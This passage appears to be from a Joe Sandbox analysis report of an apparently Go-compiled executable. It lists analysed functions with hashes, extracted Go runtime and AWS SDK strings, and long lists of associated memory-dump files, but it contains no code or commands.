            • Instruction Fuzzy Hash: D7216132A24B48C6D710EF11E841369B769F78AB80F4DA53AEB8D07729DF38C5418B54
            Function 006A3E40 Relevance: 5.3, Strings: 4, Instructions: 294COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: 2-by$expa$nd 3$te k
            • API String ID: 0-3581043453
            • Opcode ID: d0a0678b136faf6cdae2b5bb443573c909990b14ac4f0b67f8b4f134291ae36c
            • Instruction ID: d15ee406b11358018f6403af48f253ad645006815766e438fadb4aabf1d32c86
            • Opcode Fuzzy Hash: d0a0678b136faf6cdae2b5bb443573c909990b14ac4f0b67f8b4f134291ae36c
            • Instruction Fuzzy Hash: 34B1B066F25FD94AF323A63810036B7EB185FFB9C9A40E327FC9474A87D72095036254
            Function 006DE100 Relevance: 5.3, Strings: 4, Instructions: 266COMMON
            Download Yara Rule
            Strings
            • casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central A, xrefs: 006DE50F
            • newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArme, xrefs: 006DE4E5
            • runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid , xrefs: 006DE4C7
            • casgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or incomplete multibyte or wide characterinvalid value for environment variable, %s=%s, %vinternal error:, xrefs: 006DE47B
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWindowrecvfromnil PoolArme$casgstatus: bad incoming valuesresetspinning: not a spinning mentersyscallblock inconsistent runtime: split stack overflow: ...additional frames elided...unsafe.String: len out of rangecannot assign requested address.lib section in a.out corruptedW. Central A$casgstatus: waiting for Gwaiting but is Grunnablestrings.Reader.UnreadByte: at beginning of stringstrings.Reader.WriteTo: invalid WriteString countinvalid or incomplete multibyte or wide characterinvalid value for environment variable, %s=%s, %vinternal error:$runtime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1: newg missing stacknewproc1: new g is not GdeadFixedStack is not power-of-2missing stack in shrinkstack args stack map entries for invalid
            • API String ID: 0-849877203
            • Opcode ID: 9e3dcacbf537f37ec6fa4c98dd071f58aec7bf5b324836d271d2e9f60c391cb8
            • Instruction ID: 28a07c2c5107cf75db22f40c1fc7568e2e8e7dff98a178389a7446e8b8f56348
            • Opcode Fuzzy Hash: 9e3dcacbf537f37ec6fa4c98dd071f58aec7bf5b324836d271d2e9f60c391cb8
            • Instruction Fuzzy Hash: B2B1B436B05A84C6D714DB26E4853AE7762F38AB84F558637EF8C47765CB3AC482C740
            Function 006DAD60 Relevance: 5.2, Strings: 4, Instructions: 221COMMON
            Download Yara Rule
            Strings
            • runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLooku, xrefs: 006DAF25
            • reflect., xrefs: 006DAF4C
            • bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 , xrefs: 006DB013
            • runtime., xrefs: 006DAEF2
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: bad restart PC-thread limitstopm spinning nmidlelocked= needspinning=randinit twicestore64 failedsemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine file too largelevel 2 $reflect.$runtime.$runtime/internal/thread exhaustionlocked m0 woke upentersyscallblock spinningthreads=gp.waiting != nilunknown caller pcstack: frame={sp:runtime: nameOff runtime: typeOff runtime: textOff permission deniedwrong medium typeno data availableexec format errorLooku
            • API String ID: 0-302813862
            • Opcode ID: 01e31e7175e2833860d2f5030b2aff8fb8588a4696bd01ce5c3f95b5e8894900
            • Instruction ID: 19c6fa3063b8581893c22a358f62f779ae0fd291d318573f66bb75ddc8a94e6b
            • Opcode Fuzzy Hash: 01e31e7175e2833860d2f5030b2aff8fb8588a4696bd01ce5c3f95b5e8894900
            • Instruction Fuzzy Hash: 0A71C172B09A4086DB24CF60E0803BAB367F789B94F4C827AEB4D47B44DB78D895D705
            Function 00706AA0 Relevance: 4.1, Strings: 3, Instructions: 347COMMON
            Download Yara Rule
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: `Am$`Bm$Am
            • API String ID: 0-3460444615
            • Opcode ID: 600008a6cb575d96da2375e86d49b50acd032d320a0745b19e2fa148839c1c2a
            • Instruction ID: 9c822df5b7d95305ed050e4e531c1c41cda2376a43a181a6a1214be000bcb329
            • Opcode Fuzzy Hash: 600008a6cb575d96da2375e86d49b50acd032d320a0745b19e2fa148839c1c2a
            • Instruction Fuzzy Hash: 72F18B76209B84C5DBA4CF15E4503AE7BE6F385B80F19826AEA8D47BA5DF3CD494C700
            Function 006C2520 Relevance: 3.9, Strings: 3, Instructions: 179COMMON
            Download Yara Rule
            Strings
            • MB) workers=min too large-byte block (runtime: val=runtime: seq=fatal error: idlethreads= syscalltick=load64 failedxadd64 failedxchg64 failednil stackbase}sched={pc:, gp->status= pluginpath= runtime: pid=: unknown pc called from level 3 resetsrmount error, xrefs: 006C27A5
            • pacer: assist ratio=workbuf is not emptybad use of bucket.mpbad use of bucket.bpruntime: double waitws2_32.dll not foundpreempt off reason: forcegc: phase errorgopark: bad g statusgo of nil func valueselectgo: bad wakeupsemaRoot rotateRightreflect.makeFuncStub, xrefs: 006C2726
            • (scan MB in pacer: % CPU ( zombie, j0 = head = panic: nmsys= locks= dying= allocs m->g0= pad1= pad2= text= minpc= value= (scan)types : type abortedCopySidWSARecvWSASendconnectsignal TuesdayJanuaryOctoberMUI_StdMUI_Dltdefaultaws_csmoutpostFreeSidSleepExA, xrefs: 006C2745
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
